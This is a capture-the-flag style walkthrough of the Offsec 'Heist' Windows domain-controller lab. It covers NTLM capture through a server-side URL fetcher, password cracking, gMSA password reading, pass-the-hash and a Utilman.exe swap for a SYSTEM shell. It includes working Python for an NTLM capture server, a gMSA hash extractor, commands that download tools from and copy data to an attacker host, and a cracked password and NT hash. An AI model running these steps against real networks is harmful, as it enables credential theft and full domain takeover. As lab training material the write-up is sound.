Heist Walkthrough
Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)
Scanning
A full TCP port scan with version and default-script detection (the output below keeps nmap's --reason column) found the following ports and services:
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2025-10-11 10:35:35Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2025-10-11T10:37:12+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Issuer: commonName=DC01.heist.offsec
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-10T10:31:25
| Not valid after: 2026-04-11T10:31:25
| MD5: 09da:79ee:6601:19c9:baa4:7144:1555:accf
| SHA-1: 74ed:e34c:2842:7cb9:1a25:7a71:51df:e967:d259:97c2
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQSyvebt6EYItF+jWSggdRkTANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFEQzAxLmhlaXN0Lm9mZnNlYzAeFw0yNTEwMTAxMDMxMjVaFw0y
| NjA0MTExMDMxMjVaMBwxGjAYBgNVBAMTEURDMDEuaGVpc3Qub2Zmc2VjMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw0430MQvIQF4sR8VJIX5WOkrMskx
| ozIZmQwqrJo6G5+0BLOuDGjcTnT7zn5trbMBu4UuZQ40LGYB33/NtqhMaTJi1YGb
| S30wcWXTvjZHSrhnaDZHrmS+US5hcDAAGsicfqX1GOYaNnFc25MJH4vqu7C+Zehc
| v7njEdHJSacraEEPXoMoie/ATMkpwLuHxMvU8Bn0NkYb0ag+ct6rVOaN3pFL0j+d
| 5o+j5WOFlvvxRP0j0rjkXYuMY34NoZonYWJjNqJmuMEeVfOHLjBHvoxROeW7RIOC
| +Nt5TOrVNO9h5suiG/LCLPIrOccFl0eAH9w76SjYi3dduBaN44mfVj4qLQIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBADcnPkKu9op58vqtW2AiQJ5hWfEzVXL1PszskXl3U1jNF9KPKqBC
| 9Hcow41A0QqqupHxuCWM2G4VHAfPYTU8ozlYiWfz+acC5JceuPUR++SR+qulz92y
| P0kcrbSmjZXnSyr6gzGhorffIBaYKwGMrtCbKEsRLs3F5ntJk6gGkfXA+ScHL+O2
| J6revEAG/hhZlfCBbImz9aJ1oQ3TEsqBeT/V1IcAWvMKkpvmdYbv5GTBZ7FccURY
| Z2QhHHfEWQpuIOftQMHcvZsLakRLCb1SYGXbRbJCWO1Juqm94CD4j/v3QSbHIWBs
| 9DX+B6nzbGiE9SiMkWYWmJZpP8BAZzuNVFg=
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http syn-ack ttl 125 Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49759/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 37836/tcp): CLEAN (Timeout)
| Check 2 (port 20781/tcp): CLEAN (Timeout)
| Check 3 (port 32412/udp): CLEAN (Timeout)
| Check 4 (port 58212/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-11T10:36:33
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
Deduction from the above scanning
**Domain name**: heist.offsec, hostname DC01. DNS, Kerberos, LDAP/Global Catalog and ADWS (9389) all sit on this host, so it is the domain controller.
**SMB**: message signing is enabled and required, so relaying a captured NTLM authentication to SMB on this box is not an option; any hash we capture will have to be cracked instead.
**WinRM**: 5985 is open, so valid credentials translate directly into a shell.
**RDP**: 3389 is open, so RDP is possible.
**HTTP**: 8080 runs a Python/Werkzeug application titled "Super Secure Web Browser".
We will start our enumeration with HTTP first, as always, and then move on to something else.
Enumeration
HTTP 8080
Going to the website shows the "Super Secure Web Browser": you give it a link and it fetches the page for you, which means the HTTP request is made by the Windows host itself, not by our browser.
So I started a web server with Python and submitted its address as the link in the website:
sudo python3 -m http.server 80
The request came in from the target, confirming that the fetch happens server-side.
Since the fetch is made by a Windows process, the client can be talked into NTLM authentication. So I started Responder on the VPN interface in analyze mode (-A: no poisoning, only listening, which is all we need because the target connects to us on its own):
$ sudo responder -I tun0 -A
And created a request from the browser pointing at my Kali IP. Responder answered the fetch with a request for NTLM authentication and captured a Net-NTLMv2 challenge/response for the user enox.
A Net-NTLMv2 response is bound to the challenge Responder issued, so unlike an NT hash it cannot be passed around; it has to be cracked. Let's crack it with John the Ripper, which auto-detects the netntlmv2 format:
john --wordlist=/usr/share/wordlists/rockyou.txt enox.hash
Now we have a password: california.
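What Responder did on that port, as an added example that is not part of the original walkthrough or of Responder itself: a minimal HTTP listener that answers the target's fetch with a 401 and an NTLM challenge, pulls the Net-NTLMv2 response out of the Type 3 message, writes it in the line format john's netntlmv2 mode (hashcat 5600) consumes, and shows the per-guess check a cracker performs. Message layouts follow MS-NLMP; the server name "DC01", the fixed challenge, and the sample user/domain/NT hash are constructed for the demo.

```python
# Added example: a minimal stand-in for Responder's HTTP listener (MS-NLMP layouts).
import base64
import hashlib
import hmac
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer

NTLMSSP = b"NTLMSSP\x00"
FLAG_UNICODE = 0x00000001          # string fields are UTF-16LE
FLAG_NTLM = 0x00000200
FLAG_TARGET_INFO = 0x00800000
# Fixed so the demo is reproducible; a real listener draws os.urandom(8) per request.
CHALLENGE = bytes.fromhex("1122334455667788")


def build_type2(challenge: bytes, target: str = "DC01") -> bytes:
    """CHALLENGE_MESSAGE: 48-byte fixed part, then TargetName and TargetInfo payload."""
    tname = target.encode("utf-16-le")
    tinfo = b"\x00\x00\x00\x00"                          # AV_PAIR list: MsvAvEOL only
    flags = FLAG_UNICODE | FLAG_NTLM | FLAG_TARGET_INFO
    return (NTLMSSP + struct.pack("<I", 2)
            + struct.pack("<HHI", len(tname), len(tname), 48)
            + struct.pack("<I", flags) + challenge + bytes(8)  # ServerChallenge sits at 24
            + struct.pack("<HHI", len(tinfo), len(tinfo), 48 + len(tname))
            + tname + tinfo)


def _field(buf: bytes, at: int) -> bytes:
    """Resolve a (Len, MaxLen, Offset) descriptor to the bytes it points at."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, at)
    return buf[offset:offset + length]


def parse_type3(msg: bytes) -> dict:
    """AUTHENTICATE_MESSAGE: six descriptors from offset 12, NegotiateFlags at 60."""
    if msg[:8] != NTLMSSP or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    enc = "utf-16-le" if struct.unpack_from("<I", msg, 60)[0] & FLAG_UNICODE else "latin-1"
    return {"lm_response": _field(msg, 12), "nt_response": _field(msg, 20),
            "domain": _field(msg, 28).decode(enc), "user": _field(msg, 36).decode(enc),
            "workstation": _field(msg, 44).decode(enc)}


def john_line(user: str, domain: str, challenge: bytes, nt_response: bytes) -> str:
    """john 'netntlmv2' / hashcat 5600 line: user::domain:challenge:NTProofStr:blob."""
    if len(nt_response) == 24:                            # NTLMv1 is a fixed 24 bytes
        raise ValueError("NTLMv1 response: use john's netntlm format instead")
    return (f"{user}::{domain}:{challenge.hex()}:"
            f"{nt_response[:16].hex()}:{nt_response[16:].hex()}")


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """Client side (MS-NLMP 3.3.2): NTProofStr = HMAC_MD5(NTOWFv2, ServerChallenge || blob)."""
    ntowf_v2 = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, challenge + blob, hashlib.md5).digest() + blob


def check_candidate(line: str, nt_hash: bytes) -> bool:
    """What john does per guess: recompute NTProofStr from a candidate NT hash and compare."""
    user, _, domain, chal, proof, blob = line.split(":")
    guess = ntlmv2_response(nt_hash, user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
    return hmac.compare_digest(guess[:16].hex(), proof)


def build_type3(user: str, domain: str, workstation: str, nt_response: bytes) -> bytes:
    """Constructed AUTHENTICATE_MESSAGE in the shape a Windows client sends (no Version/MIC)."""
    payload = [b"", nt_response] + [s.encode("utf-16-le") for s in (domain, user, workstation)] + [b""]
    hdr, offset = NTLMSSP + struct.pack("<I", 3), 64     # LM, NT, Domain, User, Workstation, SessionKey
    for item in payload:
        hdr += struct.pack("<HHI", len(item), len(item), offset)
        offset += len(item)
    return hdr + struct.pack("<I", FLAG_UNICODE | FLAG_NTLM) + b"".join(payload)


CAPTURED = []                                             # john-format lines the server collected


class NtlmCapture(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"                         # the handshake rides one keep-alive connection

    def _reply(self, status: int, auth_header: str = "") -> None:
        self.send_response(status)
        if auth_header:
            self.send_header("WWW-Authenticate", auth_header)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self) -> None:
        auth = self.headers.get("Authorization", "")
        if not auth.startswith("NTLM "):
            return self._reply(401, "NTLM")               # invite the client to authenticate
        msg = base64.b64decode(auth[5:])
        if struct.unpack_from("<I", msg, 8)[0] == 1:      # Type 1: answer with our challenge
            return self._reply(401, "NTLM " + base64.b64encode(build_type2(CHALLENGE)).decode())
        info = parse_type3(msg)                           # Type 3: harvest the response
        CAPTURED.append(john_line(info["user"], info["domain"], CHALLENGE, info["nt_response"]))
        self._reply(200)


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), NtlmCapture).serve_forever()   # port 80 needs root
```

The point of check_candidate is why the captured value is not reusable: every guess is an HMAC over our challenge and the client's blob keyed by the candidate NT hash, so the only way from a Net-NTLMv2 line to a usable credential is a correct guess. The listener itself is deliberately barebones (no SMB, no poisoning, a constant challenge); it is enough to see the three HTTP round trips that produced enox.hash.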
Initial Access
Checking the credentials against WinRM with crackmapexec first:
crackmapexec winrm 192.168.178.165 -u enox -p california --continue-on-success
It shows the login works, so evil-winrm gives us a shell as enox:
evil-winrm -i 192.168.178.165 -u enox -p california
Post Exploitation Enumeration
Download and execute SharpHound
Since this is a domain-joined machine (the domain controller, going by the scan), I downloaded SharpHound onto it from my Kali web server and ran a full collection (evil-winrm's built-in upload command works as well):
*Evil-WinRM* PS C:\Users\enox> iwr -uri http://192.168.45.170/SharpHound.exe -Outfile sharphound.exe
*Evil-WinRM* PS C:\Users\enox> .\sharphound.exe -c All

Get the SharpHound result in Kali
Start an SMB server on the Kali machine; impacket-smbserver exports the tools/ directory as the share "smb", and -smb2support is required because recent Windows builds have SMB1 disabled:
┌──(kali㉿kali)-[~/Documents/offsec/pg_practice/heist]
└─$ mkdir tools
┌──(kali㉿kali)-[~/Documents/offsec/pg_practice/heist]
└─$ impacket-smbserver -smb2support smb tools/
Then copy the zip from the Windows machine into the share:
*Evil-WinRM* PS C:\Users\enox> copy .\20251011060753_BloodHound.zip \\192.168.45.170\smb\20251011060753_BloodHound.zip
If the copy is refused, start smbserver with -username and -password and map the share with net use first; newer Windows builds block unauthenticated guest access to SMB shares.
BloodHound review
While going through the results in BloodHound I found something under Outbound Object Control for our current user.

ReadGMSAPassword, and this felt interesting: it means the user is allowed to read the managed password of the group managed service account svc_apache.
Upon clicking on the edge, BloodHound shows the abuse information for it.

It also shows the command that can be used to get the hash.
So I downloaded the GMSAPasswordReader tool that the edge help refers to, uploaded it to the box as gmsapassreader.exe, and ran it against the account:
*Evil-WinRM* PS C:\Users\enox> .\gmsapassreader.exe --accountname "svc_apache"

!! Now we have the hashes !! The tool prints hashes for both the current and the previous password value; the NT hash (rc4_hmac) under the current value is the one to use.
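How that hash is produced, as an added example that is neither the walkthrough's nor GMSAPasswordReader's code: a principal on the gMSA's msDS-GroupMSAMembership list (what the ReadGMSAPassword edge represents) may read the account's msDS-ManagedPassword attribute over LDAP. The value is an MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19) and the rc4_hmac/NT hash is simply MD4 over the raw UTF-16LE bytes of the current password. The Python below parses such a blob and computes the hash; MD4 is implemented inline because hashlib frequently no longer provides it, and the sample blob is constructed from the password "password" so the result can be checked against that password's well-known NT hash. The LDAP read itself (done as enox) is not shown.

```python
# Added example: parse msDS-ManagedPassword (MSDS-MANAGEDPASSWORD_BLOB, MS-ADTS 2.2.19)
# and derive the gMSA's NT hash. MD4 is implemented because hashlib often lacks it.
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, the primitive behind the NT hash (NTOWFv1)."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                    # round 1
            a = rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                    # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                    # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password_utf16le: bytes) -> bytes:
    """NT hash = MD4(UTF-16LE password). A gMSA password is already raw UTF-16LE bytes,
    so the blob's CurrentPassword (minus its terminator) is hashed as-is."""
    return md4(password_utf16le)


def parse_managed_password_blob(blob: bytes) -> dict:
    """Header: Version(2) Reserved(2) Length(4) then four 2-byte offsets; strings are
    null-terminated WCHAR; the two intervals are 64-bit counts of 100 ns units."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from("<HHIHHHH", blob)
    if version != 1 or length != len(blob):
        raise ValueError("unexpected MSDS-MANAGEDPASSWORD_BLOB header")

    def wstr(off: int) -> bytes:                               # bytes up to the UTF-16 terminator
        end = off
        while end + 2 <= len(blob) and blob[end:end + 2] != b"\x00\x00":
            end += 2
        return blob[off:end]

    current, previous = wstr(cur_off), (wstr(prev_off) if prev_off else b"")
    return {"current": current, "previous": previous,
            "current_nt_hash": nt_hash(current).hex(),
            "previous_nt_hash": nt_hash(previous).hex() if previous else None,
            "query_interval_100ns": struct.unpack_from("<Q", blob, qpi_off)[0],
            "unchanged_interval_100ns": struct.unpack_from("<Q", blob, upi_off)[0]}


def build_managed_password_blob(current: bytes, previous: bytes = b"",
                                query_interval: int = 0, unchanged_interval: int = 0) -> bytes:
    """Constructed blob in the layout the DC returns, used here only to make sample input."""
    body, cur_off, prev_off = current + b"\x00\x00", 16, 0
    if previous:
        prev_off = 16 + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * (-len(body) % 8)                         # AlignmentPadding to 8 bytes
    qpi_off = 16 + len(body)
    body += struct.pack("<QQ", query_interval, unchanged_interval)
    return struct.pack("<HHIHHHH", 1, 0, 16 + len(body), cur_off, prev_off, qpi_off, qpi_off + 8) + body
```

A real gMSA password is 256 bytes of generated UTF-16 data rather than something typeable, which is why the tool hands you hashes rather than a password: the NT hash is what evil-winrm's -H needs, and it is also why the previous value matters, since the DC rotates the password on a schedule and the hash you read may be about to expire.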
Lateral Movement
Using the NT hash from the above command with evil-winrm (pass-the-hash over WinRM) to get access as the svc_apache$ account; the trailing $ is part of the gMSA's account name:
$ evil-winrm -i 192.168.178.165 -u 'svc_apache$' -H D871B9AF745F0F6B0EB97F368E81B684

Searching for ways to abuse the privileges this account holds (whoami /priv lists them), I found a GitHub page with the escalation methods, and the steps below follow it.
Privilege Escalation
With the given steps to escalate privilege:
Step 1. Download and execute Enable-SeRestorePrivilege.ps1. SeRestorePrivilege lets its holder write to and rename files regardless of their ACL, which is what allows touching system32 below; the script only enables a privilege that the account already has but that is disabled in the token, the default state for most privileges.
Downloading from my Kali machine:
iwr -uri http://192.168.45.170/EnableSeRestorePrivilege.ps1 -OutFile EnableSeRestorePrivilege.ps1
Bypassing the execution policy and then executing it:
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> powershell -ep bypass
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> .\EnableSeRestorePrivilege.ps1
Token privileges are per process, so the rename in the next step has to be done from the same shell that ran the script.
Step 2. Rename Utilman.exe to old_Utilman.exe and put cmd.exe in its place as Utilman.exe:
*Evil-WinRM* PS C:\Windows\system32> ren Utilman.exe old_Utilman.exe
*Evil-WinRM* PS C:\Windows\system32> ren cmd.exe Utilman.exe
Note that the second command moves the real cmd.exe; copy cmd.exe Utilman.exe does the same job while leaving cmd.exe in place, and cleanup afterwards is a matter of deleting the copy and renaming old_Utilman.exe back.
Step 3. Try to log in through an RDP session:
└─$ xfreerdp3 /u:enox /p:'california' /v:192.168.178.165 /timeout:6000 /d:heist.offsec /cert:ignore /sec:tls
/sec:tls matters here: it avoids NLA, so we get the Windows logon screen instead of having the credentials checked before any screen is shown. You won't be able to log in, but that doesn't matter: at the logon screen press Win+U, and winlogon launches Utilman.exe as SYSTEM, which is now cmd.exe, so a SYSTEM command prompt opens.
